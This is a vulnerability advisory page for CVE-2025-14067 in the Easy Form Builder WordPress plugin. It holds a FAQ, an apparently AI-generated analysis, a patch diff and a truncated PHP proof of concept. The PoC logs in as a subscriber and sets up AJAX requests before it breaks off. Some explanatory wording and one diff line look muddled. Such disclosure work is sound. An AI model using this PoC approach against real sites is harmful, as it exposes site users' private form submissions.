What is CVE-2025-14067?

CVE-2025-14067 is a medium severity vulnerability in the Easy Form Builder plugin for WordPress, affecting versions up to and including 3.9.3. It allows authenticated users with Subscriber-level access and above to access sensitive form response data due to a missing authorization check.

How does the vulnerability work?

The vulnerability arises from a logic error in the authorization checks within multiple AJAX endpoints of the plugin. The plugin incorrectly uses a logical AND operator instead of OR, allowing authenticated users to bypass necessary checks and access sensitive data.

Who is affected by this vulnerability?

Any WordPress site using the Easy Form Builder plugin version 3.9.3 or earlier is affected. Specifically, authenticated users with Subscriber-level permissions or higher can exploit this vulnerability to access sensitive data.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Easy Form Builder plugin installed. If it is version 3.9.3 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

To fix the vulnerability, update the Easy Form Builder plugin to version 3.9.4 or later, which contains the necessary security patch. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access to sensitive information.

What kind of data can be exposed due to this vulnerability?

The vulnerability allows attackers to access sensitive form response data, including user messages, admin replies, and user information. This data exposure can lead to privacy breaches and further attacks.

What is the proof of concept for CVE-2025-14067?

The proof of concept demonstrates how an authenticated user can exploit the vulnerability by sending AJAX requests to the vulnerable endpoints. It shows how to bypass the authorization checks to retrieve sensitive data.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Easy Form Builder plugin until it can be updated. Additionally, review user permissions and restrict access to trusted users only.

Are there any other security practices to follow?

In addition to updating plugins, regularly audit your WordPress site for vulnerabilities, use strong passwords, implement two-factor authentication, and maintain regular backups to enhance security.

What are AJAX endpoints in WordPress?

AJAX endpoints in WordPress allow for asynchronous data retrieval without reloading the page. They are commonly used in plugins for actions like form submissions and data fetching, but must be secured to prevent unauthorized access.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists, follow WordPress security blogs, and monitor the National Vulnerability Database (NVD) for updates on vulnerabilities affecting WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14067: Easy Form Builder <= 3.9.3 – Missing Authorization to Authenticated (Subscriber+) Sensitive Form Response Data Exposure (easy-form-builder)

CVE ID CVE-2025-14067

Plugin easy-form-builder

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 3.9.3

Patched Version 3.9.4

Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14067:
The Easy Form Builder WordPress plugin version 3.9.3 and earlier contains a missing authorization vulnerability in multiple AJAX endpoints. This flaw allows authenticated users with Subscriber-level permissions or higher to access sensitive form response data, including messages, admin replies, and user information. The vulnerability stems from a logical error in authorization checks across the plugin’s admin AJAX handlers.

Atomic Edge research identified the root cause as an incorrect logical operator in authorization checks within the class-Emsfb-admin.php file. The plugin used a logical AND (&&) condition to verify both a valid nonce and user permissions. The vulnerable condition `if (!check_ajax_referer(‘wp_rest’, ‘nonce’) && !$currrent_user_can)` appears across multiple functions including `get_responses_efb()`, `get_response_efb()`, `update_response_efb()`, and `delete_response_efb()`. This logic fails when either condition is false, allowing access if the user has permissions OR the nonce check passes, rather than requiring both.

The exploitation method involves authenticated attackers with Subscriber access sending AJAX requests to the WordPress admin-ajax.php endpoint. Attackers target specific AJAX actions registered by the plugin, such as ‘get_responses_efb’, ‘get_response_efb’, ‘update_response_efb’, or ‘delete_response_efb’. The attacker crafts POST requests with the ‘action’ parameter set to these vulnerable handlers and includes a valid nonce or relies on the flawed logic to bypass authorization checks entirely.

The patch in version 3.9.4 corrects the logical operator from AND (&&) to OR (||) and adds proper nonce verification. The fix changes the condition to `if (!check_ajax_referer(‘wp_rest’, ‘nonce’, false) || !$currrent_user_can)` across all affected functions. This ensures both a valid nonce AND proper user permissions are required for access. The patch also updates the nonce check to include the ‘false’ parameter to prevent termination on failure.

Successful exploitation allows attackers to retrieve sensitive form submission data containing user messages, administrative responses, and associated user information. This data exposure violates confidentiality and could lead to privacy breaches. The vulnerability does not enable modification or deletion of data beyond what the authorization flaw permits, but the exposed information could be leveraged for further attacks or social engineering.

Differential between vulnerable and patched code

Code Diff

--- a/easy-form-builder/emsfb.php
+++ b/easy-form-builder/emsfb.php
@@ -3,7 +3,7 @@
  * Plugin Name:         Easy Form Builder
  * Plugin URI:          https://whitestudio.team
  * Description:         Easily create multi-step forms with a unique Confirmation Code feature and notification emails, all without any coding knowledge required, using the easy-to-use drag and drop form wizard of Easy Form Builder. This is the free version and provides an intuitive interface and functionality to create professional forms in minutes. With the unique Confirmation Code feature, you can easily associate each submission with a specific request or user.
- * Version:             3.9.3
+ * Version:             3.9.4
  * Author:              WhiteStudio
  * Author URI:          https://whitestudio.team
  * Text Domain:         easy-form-builder
@@ -28,7 +28,7 @@
 }

 if (!defined("EMSFB_PLUGIN_VERSION")) {
-    define("EMSFB_PLUGIN_VERSION", "3.9.3");
+    define("EMSFB_PLUGIN_VERSION", "3.9.4");
 }


@@ -49,5 +49,4 @@
 $emsfb = new Emsfb();


-/* require_once 'includes/class-Emsfb-requirement.php';
-register_activation_hook(__FILE__, ['CheckRequirementEmsfb', 'run_and_save_efb']); */
+
--- a/easy-form-builder/includes/admin/class-Emsfb-admin.php
+++ b/easy-form-builder/includes/admin/class-Emsfb-admin.php
@@ -191,7 +191,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
@@ -227,7 +227,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
@@ -259,7 +259,7 @@
         $text = ["sms_noti","msg_adons","error403","invalidRequire","nAllowedUseHtml","updated","upDMsg" ,"newMessageReceived","trackNo","url","newResponse","WeRecivedUrM"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -341,7 +341,12 @@
                 $response = ['success' => false, 'm' => $m];
                 wp_send_json_success($response, 200);
             }
-
+            $pth = EMSFB_PLUGIN_DIRECTORY . '/vendor/smssended/smsefb.php';
+            if(!file_exists($pth)) {
+                $m = str_replace('NN', '<b>' . $lang['sms_noti'] . '</b>', $lang['msg_adons']);
+                $response = ['success' => false, 'm' => $m];
+                wp_send_json_success($response, 200);
+            }
 			require_once( EMSFB_PLUGIN_DIRECTORY . '/vendor/smssended/smsefb.php' );
 			$smsefb = new smssendefb();

@@ -393,7 +398,7 @@

         $dd =gettype(array_search($post_value, $allw));
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (check_ajax_referer('wp_rest', 'nonce') != 1 || $dd!="integer" && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can || $dd!="integer") {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -540,7 +545,7 @@
         $lang= $efbFunction->text_efb($text);
         $ac= $efbFunction->get_setting_Emsfb();
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -631,7 +636,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh","updated"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
@@ -661,7 +666,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -712,7 +717,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
@@ -742,7 +747,7 @@
         $text = ["spprt","error403","somethingWentWrongPleaseRefresh" ,"guest"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -785,7 +790,7 @@
         $lang= $this->efbFunction->text_efb($text);
         $currrent_user_can = $this->efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $response = ['success' => false, 'm' => $lang["error403"]];
             wp_send_json_success($response, 200);
             die("secure!");
@@ -905,7 +910,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
@@ -929,7 +934,6 @@
         }

         $m = json_decode($post_message, true);
-
         $setting = $post_message;
         $table_name = $this->db->prefix . "emsfb_setting";
         $email="";
@@ -1050,7 +1054,7 @@
         $text = ["cCodeNFound","error403"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
@@ -1085,7 +1089,7 @@
         $text = ["fileDeleted","error403"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
@@ -1147,7 +1151,7 @@
         $lang= $efbFunction->text_efb($text);
         $m = $lang["error403"];
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
             die("secure!");
@@ -1254,7 +1258,12 @@
             if(is_wp_error($r)){

             }else{
-                require_once(ABSPATH . 'wp-admin/includes/file.php');
+                $path = ABSPATH . 'wp-admin/includes/file.php';
+                if ( ! file_exists( $path ) ) {
+                    return false;
+                }
+
+                require_once($path );
                 if (WP_Filesystem()) {
                     global $wp_filesystem;

@@ -1276,8 +1285,12 @@
                 if(is_wp_error($r)){
                     return false;
                 }else{
+                $path = ABSPATH . 'wp-admin/includes/file.php';
+                if ( ! file_exists( $path ) ) {
+                    return false;
+                }

-                    require_once(ABSPATH . 'wp-admin/includes/file.php');
+                require_once($path );
                     WP_Filesystem();
                     $r = unzip_file(EMSFB_PLUGIN_DIRECTORY . '/temp/temp.zip', EMSFB_PLUGIN_DIRECTORY . '/vendor/');
                     if(is_wp_error($r)){
@@ -1391,7 +1404,6 @@


              }
-             require_once(EMSFB_PLUGIN_DIRECTORY."/includes/integrate-wpb.php");

              if (function_exists('register_block_type')) {

@@ -1404,7 +1416,7 @@

         $efbFunction = $this->get_efbFunction(1);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-       if(check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+       if(!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>'Security Error'];
             wp_send_json_success($response, 200);
@@ -1429,7 +1441,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh","copy"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>$lang["error403"]];
             wp_send_json_success($response, 200);
@@ -1488,7 +1500,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>$lang["error403"]];
             wp_send_json_success($response, 200);
@@ -1537,7 +1549,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>$lang["error403"]];
             wp_send_json_success($response, 200);
@@ -1604,7 +1616,7 @@
         $efbFunction = $this->get_efbFunction(1);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>'Security Error'];
             wp_send_json_success($response, 200);
@@ -1618,7 +1630,7 @@
         $efbFunction = $this->get_efbFunction(1);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>'Security Error'];
             wp_send_json_success($response, 200);
@@ -1678,8 +1690,15 @@
                        update_option('emsfb_email_status', result_ok('ok_set_smtp'));
                        return;
                 }else{
-                    require_once (EMSFB_PLUGIN_DIRECTORY . 'includes/class-Emsfb-requirement.php');
-                    $efbRequirement = new CheckRequirementEmsfb();
+                    $path = EMSFB_PLUGIN_DIRECTORY . 'includes/class-Emsfb-requirement.php';
+                    if (!file_exists($path)) {
+                        return;
+                    }
+                    require_once ($path);
+                    if (!class_exists('EmsfbCheckRequirementEmsfb')) {
+                        return;
+                    }
+                    $efbRequirement = new EmsfbCheckRequirementEmsfb();
                     $efbRequirement->run_and_save_efb();
                     $check = get_option('emsfb_email_status', false);
                     if(is_array($check)  && isset($check['status']) && ($check['status'] == 'ok_set_smtp' || $check['status'] == 'ok')) {
--- a/easy-form-builder/includes/class-Emsfb-public.php
+++ b/easy-form-builder/includes/class-Emsfb-public.php
@@ -6,7 +6,7 @@
  * Class _Public
  * @package Emsfb
  */
-require_once('functions.php');
+require_once(__DIR__ . '/functions.php');

 class _Public {
 	public $value;
@@ -377,7 +377,7 @@
 			window.elementorFrontendConfig = window.elementorFrontendConfig || {};
 			window.elementorFrontendConfig.tools = window.elementorFrontendConfig.tools || {};
 			window.elementorFrontendConfig.settings = window.elementorFrontendConfig.settings || {};
-			console.log('EFB: Elementor detected - config protection applied');
+
 			</script>
 			<?php
 		}
@@ -421,7 +421,7 @@
 					attempts++;

 					if (window.elementorFrontend && typeof window.elementorFrontend === 'object') {
-						console.log('🚀 EFB: Found elementorFrontend, patching methods...');
+


 						Object.defineProperty(window.elementorFrontend, 'config', {
@@ -445,9 +445,9 @@
 							window.elementorFrontend.initOnReadyComponents = function() {
 								try {

-									console.log('🔍 EFB: this.config before fix:', this.config);
-									console.log('🔍 EFB: this.config.tools before fix:', this.config ? this.config.tools : 'config is null');
-									console.log('🔍 EFB: window.elementorFrontendConfig:', window.elementorFrontendConfig);
+
+
+


 									this.config = window.elementorFrontendConfig || safeConfig;
@@ -456,9 +456,9 @@
 									this.config.tools = safeConfig.tools;
 									this.config.settings = safeConfig.settings;

-									console.log('🔧 EFB: FORCED tools and settings');
-									console.log('🔍 EFB: this.config.tools AFTER fix:', this.config.tools);
-									console.log('🛡️ EFB: Safe initOnReadyComponents called, config fixed:', this.config);
+
+
+


 									try {
@@ -503,7 +503,7 @@

 					if (attempts > 500) {
 						clearInterval(checkElementor);
-						console.log('⚠️ EFB: elementorFrontend not found, using global protection only');
+
 					}
 				}, 10);
 				console.log('� EFB: Ultimate Elementor fix started');
@@ -1133,7 +1133,7 @@


 		/* if ($s_sid !=1){
-			error_log('Invalid SID: ' . $sid);
+
 			$m =  $this->lanText["somethingWentWrongPleaseRefresh"]. '<br>'. esc_html__('Error Code','easy-form-builder') .': 403';
 			$response = array( 'success' => false  , 'm'=>$m);
 			wp_send_json_success($response,200);
@@ -3202,11 +3202,6 @@
 		$this->id =sanitize_text_field( wp_unslash($data_POST['id']));
 		$sid = '';

-	/* 	if ($s_sid !=1){
-			$m = esc_html__('error', 'easy-form-builder') . ' 403';
-			$response = array( 'success' => false  , 'm'=>$m);
-			wp_send_json_success($response,200);
-		} */
 		$r= $this->setting!=NULL  && empty($this->setting)!=true ? $this->setting:  $this->get_setting_Emsfb('setting');
 		$Sk ='null';
 		if(gettype($r)=="string"){
@@ -3412,12 +3407,7 @@

 		$text_=['somethingWentWrongPleaseRefresh'];
 		$this->lanText= $this->efbFunction->text_efb($text_);
-		/* if ($s_sid !=1){

-			$m =  $this->lanText["somethingWentWrongPleaseRefresh"]. '<br>'. esc_html__('Error Code','easy-form-builder') .': 403';
-		$response = array( 'success' => false  , 'm'=>$m);
-		wp_send_json_success($response,200);
-		} */
 		$Sk ='null';
 		if(gettype($r)=="string"){
 			$setting =str_replace('\', '', $r);
--- a/easy-form-builder/includes/class-Emsfb.php
+++ b/easy-form-builder/includes/class-Emsfb.php
@@ -39,8 +39,11 @@
         );


+        add_action('upgrader_process_complete', [$this, 'plugin_update_completed_efb'], 10, 2);


+        add_action('plugins_loaded', [$this, 'check_version_and_upgrade_efb']);
+
     }


@@ -102,26 +105,59 @@
         }
     }

-    public static  function email_send_efb(){
-		$message=esc_html__('The Easy Form Builder had Important update and require to deactivate and activate the plugin manually </br> Notice:Please do this act in immediately so forms of your site will available again.','easy-form-builder');
-		$usr=get_userdata(1);
-
-		$users = get_super_admins();
-		foreach ($users as $key => $value) {
-			$user =get_user_by('login',$value);
-			$to = $usr ->data->user_email;
-            $SERVER_NAME = isset($_SERVER['SERVER_NAME']) ? sanitize_text_field( wp_unslash( $_SERVER['SERVER_NAME'] ) ) : 'yourdomain.com';
-			$from =get_bloginfo('name')." <no-reply@".$SERVER_NAME.">";
-			$headers = array(
-				'MIME-Version: 1.0rn',
-				'"Content-Type: text/html; charset=ISO-8859-1rn"',
-			'From:'.$from.''
-			);
-		$subject = "Important Warning form ".get_bloginfo('name');
-		$to = wp_mail($to, $subject, wp_kses_post($message), $headers);
-		}
+ /**
+     * Send email notification to all super admins about database changes
+     *
+     * @since 3.9.4
+     * @return void
+     */
+    public static function email_send_efb() {
+        $message = esc_html__( 'The Easy Form Builder had Important update and require to deactivate and activate the plugin manually </br> Notice: Please do this act immediately so forms of your site will be available again.', 'easy-form-builder' );
+
+
+        $super_admins = get_super_admins();
+
+        if ( empty( $super_admins ) ) {
+            return;
+        }
+
+
+        $recipients = array();
+
+        foreach ( $super_admins as $admin_login ) {
+            $user = get_user_by( 'login', $admin_login );
+
+            if ( $user && is_email( $user->user_email ) ) {
+                $recipients[] = sanitize_email( $user->user_email );
+            }
+        }
+
+
+        if ( empty( $recipients ) ) {
+            return;
+        }
+
+
+        $server_name = isset( $_SERVER['SERVER_NAME'] ) ? sanitize_text_field( wp_unslash( $_SERVER['SERVER_NAME'] ) ) : 'yourdomain.com';
+        $from_email  = 'no-reply@' . $server_name;
+        $from_name   = get_bloginfo( 'name' );
+
+        $headers = array(
+            'Content-Type: text/html; charset=UTF-8',
+            sprintf( 'From: %s <%s>', $from_name, $from_email ),
+        );
+
+
+        $subject = sprintf(
+
+            esc_html__( 'Important Warning from %s', 'easy-form-builder' ),
+            get_bloginfo( 'name' )
+        );

-	}
+
+
+        wp_mail( $recipients, $subject, wp_kses_post( $message ), $headers );
+    }

     /**
      * Initialize Elementor compatibility for all EFB admin pages
@@ -147,6 +183,7 @@
      * Apply Elementor admin compatibility fixes to prevent conflicts
      */
     public function apply_elementor_admin_fixes_efb() {
+
         add_action('admin_footer', array($this, 'elementor_admin_conflict_prevention_efb'));
     }

@@ -174,25 +211,32 @@
         $current_page = isset($_GET['page']) ? sanitize_key( $_GET['page'] ) : '';
         ?>
         <script type="text/javascript">
+
         (function($) {
             'use strict';

+
             if (typeof window.efb_global_elementor_protection === 'undefined') {
                 window.efb_global_elementor_protection = true;

-                // Fix Elementor tools undefined error
+                 ?>');
+
+
                 if (typeof elementorFrontend !== 'undefined') {
                     try {
+
                         if (!elementorFrontend.tools) {
                             elementorFrontend.tools = {};
+
                         }
                     } catch (e) {
-                        // Silently handle error
+
                     }
                 }

+
                 $(document).ready(function() {
-                    // Suppress Elementor-related errors
+
                     $(window).on('error', function(e) {
                         if (e.originalEvent && e.originalEvent.message) {
                             var errorMessage = e.originalEvent.message.toLowerCase();
@@ -200,9 +244,8 @@
                                 errorMessage.includes('elementor') ||
                                 errorMessage.includes('tools') ||
                                 errorMessage.includes('cannot read properties of undefined')) {
-
                                 if (window.console && window.console.log && typeof window.efb_debug !== 'undefined' && window.efb_debug) {
-                                    console.log('EFB: Suppressed Elementor error:', errorMessage);
+
                                 }
                                 e.preventDefault();
                                 return false;
@@ -210,7 +253,7 @@
                         }
                     });

-                    // Fix dispatchEvent errors - use EventTarget instead of Event
+
                     if (window.EventTarget && window.EventTarget.prototype && EventTarget.prototype.dispatchEvent) {
                         var originalDispatchEvent = EventTarget.prototype.dispatchEvent;
                         EventTarget.prototype.dispatchEvent = function(event) {
@@ -218,7 +261,7 @@
                                 return originalDispatchEvent.call(this, event);
                             } catch (e) {
                                 if (window.console && typeof window.efb_debug !== 'undefined' && window.efb_debug) {
-                                    console.log('EFB: dispatchEvent error caught:', e.message);
+
                                 }
                                 return false;
                             }
@@ -231,4 +274,85 @@
         <?php
     }

+    /**
+     * Check version and run upgrade tasks if needed
+     *
+     * @since 3.9.4
+     * @return void
+     */
+    public function check_version_and_upgrade_efb() {
+        $installed_version = get_option('emsfb_version', '0.0.0');
+        $current_version = EMSFB_PLUGIN_VERSION;
+
+
+        if (version_compare($installed_version, $current_version, '<')) {
+            $this->run_upgrade_tasks_efb($installed_version, $current_version);
+            update_option('emsfb_version', $current_version);
+        }
+    }
+
+    /**
+     * Run upgrade tasks after plugin update
+     *
+     * @since 3.9.4
+     * @param string $old_version Old plugin version
+     * @param string $new_version New plugin version
+     * @return void
+     */
+    private function run_upgrade_tasks_efb($old_version, $new_version) {
+
+        if (function_exists('wp_cache_flush')) {
+            wp_cache_flush();
+        }
+
+
+        if (function_exists('wp_cache_flush_group')) {
+            wp_cache_flush_group('emsfb');
+        }
+
+
+        global $wpdb;
+        $wpdb->query(
+            "DELETE FROM {$wpdb->options} WHERE option_name LIKE '_transient_efb_%' OR option_name LIKE '_transient_timeout_efb_%'"
+        );
+
+
+        error_log(sprintf(
+            'Easy Form Builder upgraded from %s to %s - All caches cleared',
+            $old_version,
+            $new_version
+        ));
+    }
+
+    /**
+     * Hook that runs when plugin is updated via WordPress admin
+     *
+     * @since 3.9.4
+     * @param object $upgrader_object Plugin upgrader object
+     * @param array $options Update options
+     * @return void
+     */
+    public function plugin_update_completed_efb($upgrader_object, $options) {
+
+        if ($options['action'] !== 'update' || $options['type'] !== 'plugin') {
+            return;
+        }
+
+
+        $our_plugin = plugin_basename(EMSFB_PLUGIN_FILE);
+
+        if (isset($options['plugins'])) {
+            foreach ($options['plugins'] as $plugin) {
+                if ($plugin === $our_plugin) {
+
+                    $this->run_upgrade_tasks_efb(
+                        get_option('emsfb_version', '0.0.0'),
+                        EMSFB_PLUGIN_VERSION
+                    );
+                    break;
+                }
+            }
+        }
+    }
+
 }
--- a/easy-form-builder/includes/functions.php
+++ b/easy-form-builder/includes/functions.php
@@ -1713,7 +1713,15 @@


 		}else{
-			require_once(ABSPATH . 'wp-admin/includes/file.php');
+			$path= ABSPATH . 'wp-admin/includes/file.php';
+			if ( ! file_exists( $path ) ) {
+
+				return false;
+			}else{
+				require_once( ABSPATH . 'wp-admin/includes/file.php' );
+			}
+
+
 			if (WP_Filesystem()) {
 				global $wp_filesystem;

--- a/easy-form-builder/vendor/composer/InstalledVersions.php
+++ b/easy-form-builder/vendor/composer/InstalledVersions.php
@@ -264,8 +264,8 @@
         @trigger_error('getRawData only returns the first dataset loaded, which may not be what you expect. Use getAllRawData() instead which returns all datasets for all autoloaders present in the process.', E_USER_DEPRECATED);

         if (null === self::$installed) {
-
-
+            // only require the installed.php file if this file is loaded from its dumped location,
+            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
             if (substr(__DIR__, -8, 1) !== 'C') {
                 self::$installed = include __DIR__ . '/installed.php';
             } else {
@@ -337,8 +337,8 @@
         }

         if (null === self::$installed) {
-
-
+            // only require the installed.php file if this file is loaded from its dumped location,
+            // and not from its source location in the composer/composer package, see https://github.com/composer/composer/issues/9937
             if (substr(__DIR__, -8, 1) !== 'C') {
                 self::$installed = require __DIR__ . '/installed.php';
             } else {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14067 - Easy Form Builder <= 3.9.3 - Missing Authorization to Authenticated (Subscriber+) Sensitive Form Response Data Exposure

<?php
/**
 * Proof of Concept for CVE-2025-14067
 * Requires: WordPress installation with Easy Form Builder plugin <= 3.9.3
 *          Valid subscriber-level credentials
 *          A form with existing submissions
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_password';

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Authenticate to WordPress and obtain cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

$response = curl_exec($ch);

// Step 2: Extract nonce from admin page (required for AJAX requests)
// The vulnerability's flawed logic may allow bypass, but we include nonce for completeness
$admin_url = $target_url . '/wp-admin/admin.php?page=emsfb';
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_POST, false);
$admin_page = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation would parse HTML)
// Nonce is typically in JavaScript or hidden fields
$nonce = 'wp_rest_nonce_value'; // This would be extracted from the page

// Step 3: Exploit vulnerable AJAX endpoint to retrieve form responses
